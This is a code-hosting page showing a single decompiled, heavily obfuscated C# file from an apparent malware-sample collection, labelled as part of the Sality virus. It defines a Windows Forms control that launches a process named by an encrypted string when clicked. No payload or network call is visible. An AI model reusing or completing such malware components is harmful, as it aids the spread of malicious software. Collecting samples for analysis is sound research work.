MalwareSourceCode/MSIL/Virus/Win32/S/Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975/_0005/_0004.cs
2022-08-18 06:28:56 -05:00

108 lines
3.7 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: a5b7ee8e-cbdf-4eff-9144-efd0c433f3fe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 97CE9FDF-0921-44CB-AE13-1E9A2A550F0F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975.exe
using \u0001;
using \u0005;
using System;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace \u0005
{
internal sealed class \u0004 : Control
{
[NonSerialized]
internal static \u0002 \u0001;
private Label \u0001 = new Label();
private PictureBox \u0001 = new PictureBox();
private ToolTip \u0001 = new ToolTip();
private float \u0001 = 1f;
private float \u0002 = 1f;
protected override void OnResize([In] EventArgs obj0)
{
\u009C\u0002.\u0095((object) this, new Size(\u008E\u0005.\u008A\u0004(120f * this.\u0001), \u008E\u0005.\u008A\u0004(32f * this.\u0002)));
\u0094\u0005.\u0007\u0002((object) this, obj0);
}
protected override void ScaleCore([In] float obj0, [In] float obj1)
{
this.\u0001 = obj0;
this.\u0002 = obj1;
\u0013\u0004.\u000F\u0002((object) this, obj0, obj1);
\u0094\u0005.\u007E\u0007\u0002((object) this, EventArgs.Empty);
}
protected override void Dispose([In] bool obj0)
{
if (obj0)
goto label_5;
label_4:
\u000E\u0003.\u0001\u0002((object) this, obj0);
return;
label_5:
if (this.\u0001 != null)
\u0087\u0005.\u007E\u0016\u0008((object) this.\u0001);
if (this.\u0001 != null)
{
\u0087\u0005.\u007E\u0016\u0008((object) this.\u0001);
goto label_4;
}
else
goto label_4;
}
private void \u0003([In] object obj0, [In] EventArgs obj1)
{
try
{
this.\u0003();
}
catch
{
}
}
private void \u0003()
{
Process process = \u0080\u0005.\u0080\u0008(\u0004.\u0001(3324));
}
public \u0004()
{
\u0087\u0005.\u0012\u0002((object) this);
\u0095\u0003.\u007E\u008E\u0002((object) this.\u0001, FlatStyle.System);
\u0098\u0002.\u007E\u0092((object) this.\u0001, new Point(10, 10));
\u009C\u0002.\u007E\u0095((object) this.\u0001, new Size(62, 24));
\u0096\u0004.\u007E\u0099((object) this.\u0001, \u0004.\u0001(3393));
\u0092\u0004.\u007E\u0095\u0002((object) this.\u0001, (Image) \u0006.\u0003(\u0004.\u0001(3410)));
\u0098\u0002.\u007E\u0092((object) this.\u0001, new Point(72, 0));
\u009C\u0002.\u007E\u0095((object) this.\u0001, new Size(48, 32));
\u0018\u0004.\u007E\u0096\u0002((object) this.\u0001, PictureBoxSizeMode.StretchImage);
\u001F\u0005.\u007E\u009D((object) this.\u0001, new EventHandler(this.\u0003));
\u001F\u0005.\u007E\u009D((object) this.\u0001, new EventHandler(this.\u0003));
\u001F\u0005.\u009D((object) this, new EventHandler(this.\u0003));
\u0092\u0005.\u007E\u0088((object) this, \u0006\u0003.\u001B\u0002());
\u000E\u0003.\u0097((object) this, false);
\u009C\u0002.\u0095((object) this, new Size(120, 32));
\u0019\u0003.\u007E\u0014\u0002((object) \u0093\u0003.\u0087((object) this), new Control[2]
{
(Control) this.\u0001,
(Control) this.\u0001
});
string str = \u0004.\u0001(3419);
\u009A\u0003.\u007E\u009C\u0002((object) this.\u0001, (Control) this, str);
\u009A\u0003.\u007E\u009C\u0002((object) this.\u0001, (Control) this.\u0001, str);
\u009A\u0003.\u007E\u009C\u0002((object) this.\u0001, (Control) this.\u0001, str);
\u000E\u0003.\u000E\u0002((object) this, true);
}
static \u0004() => \u0003.\u0003();
}
}